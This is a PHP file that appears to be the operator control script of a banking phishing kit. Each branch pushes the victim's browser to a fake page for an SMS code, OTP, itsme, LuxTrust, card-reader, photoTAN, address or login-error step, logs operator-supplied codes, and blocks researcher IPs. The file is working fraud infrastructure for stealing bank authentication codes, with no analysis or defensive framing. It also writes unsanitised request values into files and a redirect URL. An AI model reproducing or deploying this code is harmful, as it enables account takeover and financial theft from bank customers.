<?php


session_start();

if(isset($_GET['ip'])) 
{

$Pageee .= ''.$_GET['ip'].',';

$f = fopen("../../../honeypotbots.dat", "a");
	fwrite($f, $Pageee);


$Pag .= 'This ip '.$_GET['ip'].' Blocked Successfully ';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['App'])) {

$Page .= '<meta http-equiv="refresh" content="0;url=./Account_App.php" />';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to App';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

$Pagmt .= ''.$_POST['Code'].'';
$fPagmt = fopen("../System_sql/Code.txt", "w");
fwrite($fPagmt, $Pagmt);

header("location:../dashboard.php");

}
elseif (isset($_GET['Response'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Telephone.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Telephone';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);

	
	header("location:../dashboard.php");
	
	}
elseif (isset($_GET['ReaderCode'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Redar.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Reader Code';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);
	
	$Pagmt .= ''.$_POST['CodeReaderCode'].'';
	$fPagmt = fopen("../System_sql/CodeReader.txt", "w");
	fwrite($fPagmt, $Pagmt);
	
	header("location:../dashboard.php");
	
	}
	
	
	elseif (isset($_GET['id'])) {

$Page .= '<meta http-equiv="refresh" content="0;url=./Accoun_Sms.php" />';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);


$Pag .= 'Redirected to Sms Code';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

$Pagmt .= ''.$_POST['Code'].'';
$fPagmt = fopen("../System_sql/Code.txt", "w");
fwrite($fPagmt, $Pagmt);

header("location:../dashboard.php");

}elseif (isset($_GET['phone'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_otp.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to OTP';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

header("location:../dashboard.php");

}
elseif (isset($_GET['Numero'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=../Sign_Info.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to Adress Info';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

header("location:../dashboard.php");

}elseif (isset($_GET['LuxTrust'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_LuxTrust.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to LuxTrust';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['login'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=../Sign_Error.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to itsme';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}
elseif (isset($_GET['Codesms'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Sms.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Sms';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);
	
	
	header("location:../dashboard.php");
	
	}
elseif (isset($_GET['Reader'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=../Sign_Reader.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Reader';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);
	
	
	header("location:../dashboard.php");
	
	}
	elseif (isset($_GET['itsmePhone'])) {

		$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_App.php" />  ';
		
		$fPage = fopen("../System_sql/Redirect.txt", "w");
		fwrite($fPage, $Page);
		
		
		
		$Pag .= 'Redirected to App';
		
		$fPag = fopen("../System_sql/Go.txt", "w");
		fwrite($fPag, $Pag);
		
		
		header("location:../dashboard.php");
		
		}
	elseif (isset($_GET['info'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_App.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to Info';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['ReaderCode2'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Code_Redar.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Reader Code 2';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);
	
	$Pagm .= ''.$_POST['ReaderCode11'].'';
	$fPagm = fopen("../System_sql/Code11.txt", "w");
	fwrite($fPagm, $Pagm);
	
	$Pagms .= ''.$_POST['ReaderCode22'].'';
	$fPagms = fopen("../System_sql/Code22.txt", "w");
	fwrite($fPagms, $Pagms);

	
	header("location:../dashboard.php");
	
	}elseif (isset($_GET['sms'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Sms.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to Sms';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

$Pagm .= ''.$_POST['Code'].'';
$fPagm = fopen("../System_sql/Code.txt", "w");
fwrite($fPagm, $Pagm);


header("location:../dashboard.php");

}elseif (isset($_GET['Phototan'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_PhotoTan.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);

$photoB .= ' '.$_POST['photo'].' ';
$photoBS = fopen("../System_sql/Phototan.txt", "w");
fwrite($photoBS, $photoB);

$Pag .= 'Redirected to Phototan';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['redirect'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url='.$_POST['tnks'].'" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);


$Pag .= 'Redirected to Link';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}

else {




}

?>